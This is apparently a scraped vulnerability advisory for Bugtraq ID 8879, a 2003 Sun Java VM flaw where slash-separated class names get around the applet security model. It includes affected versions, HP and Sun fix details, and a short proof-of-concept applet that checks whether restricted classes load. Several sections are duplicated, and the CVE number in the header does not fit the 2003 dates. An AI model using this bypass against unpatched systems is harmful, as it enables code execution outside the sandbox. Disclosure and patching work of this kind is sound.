Sun Java Virtual Machine Slash Path Security Model Circumvention Vulnerability
BID:8879
CVE-2006-4302 |Info
Sun Java Virtual Machine Slash Path Security Model Circumvention Vulnerability
| Bugtraq ID: | 8879 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 22 2003 12:00AM |
| Updated: | Oct 22 2003 12:00AM |
| Credit: | Discovery is credited to Last Stage of Delirium. |
| Vulnerable: |
Sun SDK (Windows Production Release) 1.4.1 _03 Sun SDK (Windows Production Release) 1.4.1 _02 Sun SDK (Windows Production Release) 1.4.1 _01 Sun SDK (Windows Production Release) 1.4.1 Sun SDK (Windows Production Release) 1.3.1 _07 Sun SDK (Windows Production Release) 1.3.1 _06 Sun SDK (Windows Production Release) 1.3.1 _05 Sun SDK (Windows Production Release) 1.3.1 _04 Sun SDK (Windows Production Release) 1.3.1 _03 Sun SDK (Windows Production Release) 1.3.1 _02 Sun SDK (Windows Production Release) 1.3.1 _01a Sun SDK (Windows Production Release) 1.2.2 _015 Sun SDK (Windows Production Release) 1.2.2 _014 Sun SDK (Windows Production Release) 1.2.2 _013 Sun SDK (Windows Production Release) 1.2.2 _012 Sun SDK (Windows Production Release) 1.2.2 _012 Sun SDK (Windows Production Release) 1.2.2 _011 Sun SDK (Windows Production Release) 1.2.2 _010 Sun SDK (Solaris Reference Release) 1.2.2 _015 Sun SDK (Solaris Reference Release) 1.2.2 _014 Sun SDK (Solaris Reference Release) 1.2.2 _013 Sun SDK (Solaris Reference Release) 1.2.2 _012 Sun SDK (Solaris Reference Release) 1.2.2 _011 Sun SDK (Solaris Reference Release) 1.2.2 _010 Sun SDK (Solaris Production Release) 1.4.1 _03 Sun SDK (Solaris Production Release) 1.4.1 _02 Sun SDK (Solaris Production Release) 1.4.1 _01 Sun SDK (Solaris Production Release) 1.4.1 Sun SDK (Solaris Production Release) 1.3.1 _07 Sun SDK (Solaris Production Release) 1.3.1 _06 Sun SDK (Solaris Production Release) 1.3.1 _05 Sun SDK (Solaris Production Release) 1.3.1 _03 Sun SDK (Solaris Production Release) 1.3.1 _02 Sun SDK (Solaris Production Release) 1.3.1 _01 Sun SDK (Solaris Production Release) 1.2.2 _14 Sun SDK (Solaris Production Release) 1.2.2 _13 Sun SDK (Solaris Production Release) 1.2.2 _12 Sun SDK (Solaris Production Release) 1.2.2 _11 Sun SDK (Solaris Production Release) 1.2.2 _10 Sun SDK (Solaris Production Release) 1.2.2 _07a Sun SDK (Solaris Production Release) 1.2.2 Sun SDK (Linux Production Release) 1.4.1 _03 Sun SDK (Linux Production Release) 1.4.1 _02 Sun SDK (Linux Production Release) 1.4.1 _01 Sun SDK (Linux Production Release) 1.4.1 Sun SDK (Linux Production Release) 1.3.1 _07 Sun SDK (Linux Production Release) 1.3.1 _06 Sun SDK (Linux Production Release) 1.3.1 _05 Sun SDK (Linux Production Release) 1.3.1 _03 Sun SDK (Linux Production Release) 1.3.1 _02 Sun SDK (Linux Production Release) 1.3.1 _01 Sun SDK (Linux Production Release) 1.2.2 _13 Sun SDK (Linux Production Release) 1.2.2 _12 Sun SDK (Linux Production Release) 1.2.2 _015 Sun SDK (Linux Production Release) 1.2.2 _014 Sun SDK (Linux Production Release) 1.2.2 _011 Sun SDK (Linux Production Release) 1.2.2 _010 Sun JRE (Windows Production Release) 1.4.2 _01 Sun JRE (Windows Production Release) 1.4.1 _03 Sun JRE (Windows Production Release) 1.4.1 _02 Sun JRE (Windows Production Release) 1.4.1 _01 Sun JRE (Windows Production Release) 1.4.1 Sun JRE (Windows Production Release) 1.3.1 _07 Sun JRE (Windows Production Release) 1.3.1 _06 Sun JRE (Windows Production Release) 1.3.1 _05 Sun JRE (Windows Production Release) 1.3.1 _04 Sun JRE (Windows Production Release) 1.3.1 _03 Sun JRE (Windows Production Release) 1.3.1 _02 Sun JRE (Windows Production Release) 1.3.1 _01a Sun JRE (Windows Production Release) 1.3.1 _01 Sun JRE (Windows Production Release) 1.2.2 _015 Sun JRE (Windows Production Release) 1.2.2 _014 Sun JRE (Windows Production Release) 1.2.2 _013 Sun JRE (Windows Production Release) 1.2.2 _011 Sun JRE (Windows Production Release) 1.2.2 _010 Sun JRE (Windows Production Release) 1.2.2 Sun JRE (Solaris Production Release) 1.4.1 _03 Sun JRE (Solaris Production Release) 1.4.1 _02 Sun JRE (Solaris Production Release) 1.4.1 _01 Sun JRE (Solaris Production Release) 1.4.1 Sun JRE (Solaris Production Release) 1.3.1 _07 Sun JRE (Solaris Production Release) 1.3.1 _06 Sun JRE (Solaris Production Release) 1.3.1 _05 Sun JRE (Solaris Production Release) 1.3.1 _04 Sun JRE (Solaris Production Release) 1.3.1 _03 Sun JRE (Solaris Production Release) 1.3.1 _02 Sun JRE (Solaris Production Release) 1.3.1 _01 Sun JRE (Solaris Production Release) 1.2.2 _014 Sun JRE (Solaris Production Release) 1.2.2 _013 Sun JRE (Solaris Production Release) 1.2.2 _012 Sun JRE (Solaris Production Release) 1.2.2 _011 Sun JRE (Solaris Production Release) 1.2.2 _010 Sun JRE (Solaris Production Release) 1.2.2 Sun JRE (Reference Release) 1.2.2 _011 Sun JRE (Reference Release) 1.2.2 _010 Sun JRE (Linux Production Release) 1.4.1 _03 Sun JRE (Linux Production Release) 1.4.1 _02 Sun JRE (Linux Production Release) 1.4.1 _01 Sun JRE (Linux Production Release) 1.4.1 Sun JRE (Linux Production Release) 1.3.1 _07 Sun JRE (Linux Production Release) 1.3.1 _06 Sun JRE (Linux Production Release) 1.3.1 _05 Sun JRE (Linux Production Release) 1.3.1 _03 Sun JRE (Linux Production Release) 1.3.1 _02 Sun JRE (Linux Production Release) 1.3.1 _01 Sun JRE (Linux Production Release) 1.3.1 Sun JRE (Linux Production Release) 1.2.2 _015 Sun JRE (Linux Production Release) 1.2.2 _014 Sun JRE (Linux Production Release) 1.2.2 _013 Sun JRE (Linux Production Release) 1.2.2 _011 Sun JRE (Linux Production Release) 1.2.2 _010 Sun JRE (Linux Production Release) 1.2.2 _007 Sun JRE (Linux Production Release) 1.2.2 _006 Sun JRE (Linux Production Release) 1.2.2 _005 Sun JRE (Linux Production Release) 1.2.2 _004 Sun JRE (Linux Production Release) 1.2.2 _003 Sun JRE (Linux Production Release) 1.2.2 HP HP-UX (VVOS) 11.0 4 HP HP-UX 11.23 HP HP-UX 11.22 HP HP-UX 11.11 HP HP-UX 11.0 4 HP HP-UX 11.0 HP HP-UX B.11.23 HP HP-UX B.11.22 HP HP-UX B.11.11 HP HP-UX B.11.04 HP HP-UX B.11.00 |
| Not Vulnerable: | |
Discussion
Sun Java Virtual Machine Slash Path Security Model Circumvention Vulnerability
A vulnerability has been identified in the Sun Java Virtual Machine packaged with JRE and SDK. This issue results in the circumvention of the Java Security Model, and can permit an attacker to execute arbitrary code on vulnerable hosts.
A vulnerability has been identified in the Sun Java Virtual Machine packaged with JRE and SDK. This issue results in the circumvention of the Java Security Model, and can permit an attacker to execute arbitrary code on vulnerable hosts.
Exploit / POC
Sun Java Virtual Machine Slash Path Security Model Circumvention Vulnerability
The following proof-of-concept code has been made available by Alla Bezroutchko <[email protected]>:
import java.applet.Applet;
import java.awt.Graphics;
import java.lang.Class;
import java.security.AccessControlException;
public class Simple extends Applet {
StringBuffer buffer;
public void init() {
buffer = new StringBuffer();
}
public void start() {
ClassLoader cl = this.getClass().getClassLoader();
try {
Class cla =
cl.loadClass("sun/applet/AppletClassLoader"); // Note the slashes
addItem("No exception in loadClass. Vulnerable!");
} catch (ClassNotFoundException e) {
addItem("ClassNotFoundException in loadClass - " + e);
} catch (AccessControlException e) {
addItem("AccessControlException in loadClass - Not
Vulnerable!");
}
}
void addItem(String newWord) {
System.out.println(newWord);
buffer.append(newWord);
repaint();
}
public void paint(Graphics g) {
//Draw a Rectangle around the applet's display area.
g.drawRect(0, 0, size().width - 1, size().height - 1);
//Draw the current string inside the rectangle.
g.drawString(buffer.toString(), 5, 15);
}
}
The following proof-of-concept code has been made available by Alla Bezroutchko <[email protected]>:
import java.applet.Applet;
import java.awt.Graphics;
import java.lang.Class;
import java.security.AccessControlException;
public class Simple extends Applet {
StringBuffer buffer;
public void init() {
buffer = new StringBuffer();
}
public void start() {
ClassLoader cl = this.getClass().getClassLoader();
try {
Class cla =
cl.loadClass("sun/applet/AppletClassLoader"); // Note the slashes
addItem("No exception in loadClass. Vulnerable!");
} catch (ClassNotFoundException e) {
addItem("ClassNotFoundException in loadClass - " + e);
} catch (AccessControlException e) {
addItem("AccessControlException in loadClass - Not
Vulnerable!");
}
}
void addItem(String newWord) {
System.out.println(newWord);
buffer.append(newWord);
repaint();
}
public void paint(Graphics g) {
//Draw a Rectangle around the applet's display area.
g.drawRect(0, 0, size().width - 1, size().height - 1);
//Draw the current string inside the rectangle.
g.drawString(buffer.toString(), 5, 15);
}
}
Solution / Fix
Sun Java Virtual Machine Slash Path Security Model Circumvention Vulnerability
Solution:
HP has released an advisory (HPSBUX0311-295) to address this issue. HP suggests the following manual updates:
Java 1.4.1.04 or later (T1456AA (JDK 1.4), T1457AA (JRE 1.4))
Java 1.3.1.11 or later (B9788AA (JDK 1.3), B9789AA (JRE 1,3))
Java 1.2.1.16 or later (B8110AA (JDK 1.2), B8111AA (JRE 1.2))
These updates may be obtained from www.hp.com/go/java. HP revised their advisory to include details about HP-UX 11.04 (VVOS). This issue affects HP-UX 11.04 (VVOS) with Virtualvault A.04.50 or Virtualvault A.04.60 or Virtualvault A.04.70 installed. These platforms are only affected if Java has been downloaded and integrated on Virtualvault. Further details may be found in the advisory.
This issue is addressed in the following SDK and JRE versions of Windows Production Releases, Solaris OE Production Releases and Linux Production Releases:
SDK and JRE 1.4.1_04 and later
SDK and JRE 1.3.1_09 and later
SDK and JRE 1.2.2_016 and later
Solaris Operating Environment (OE) Reference Releases SDK and JRE 1.2.2_016 and later also include fixes.
Fixes are available at the following location:
http://java.sun.com/j2se/
See referenced advisory for additional details.
HP has released an update the their original advisory stating that more HP-UX versions are affected that were originally reported. Please see the referenced advisory for more information.
Solution:
HP has released an advisory (HPSBUX0311-295) to address this issue. HP suggests the following manual updates:
Java 1.4.1.04 or later (T1456AA (JDK 1.4), T1457AA (JRE 1.4))
Java 1.3.1.11 or later (B9788AA (JDK 1.3), B9789AA (JRE 1,3))
Java 1.2.1.16 or later (B8110AA (JDK 1.2), B8111AA (JRE 1.2))
These updates may be obtained from www.hp.com/go/java. HP revised their advisory to include details about HP-UX 11.04 (VVOS). This issue affects HP-UX 11.04 (VVOS) with Virtualvault A.04.50 or Virtualvault A.04.60 or Virtualvault A.04.70 installed. These platforms are only affected if Java has been downloaded and integrated on Virtualvault. Further details may be found in the advisory.
This issue is addressed in the following SDK and JRE versions of Windows Production Releases, Solaris OE Production Releases and Linux Production Releases:
SDK and JRE 1.4.1_04 and later
SDK and JRE 1.3.1_09 and later
SDK and JRE 1.2.2_016 and later
Solaris Operating Environment (OE) Reference Releases SDK and JRE 1.2.2_016 and later also include fixes.
Fixes are available at the following location:
http://java.sun.com/j2se/
See referenced advisory for additional details.
HP has released an update the their original advisory stating that more HP-UX versions are affected that were originally reported. Please see the referenced advisory for more information.
References
Sun Java Virtual Machine Slash Path Security Model Circumvention Vulnerability
References:
References:
- Sun Alert ID: 57221 (Sun)
- Re: [LSD] Security vulnerability in SUN's Java Virtual Machine implementation ("Michael Earls"
) - [LSD] Security vulnerability in SUN's Java Virtual Machine implementation (Last Stage of Delirium
) - Re: [LSD] Security vulnerability in SUN's Java Virtual Machine implementation (Alla Bezroutchko
) - Re: [LSD] Security vulnerability in SUN's Java Virtual Machine implementation (Marc Schoenefeld
)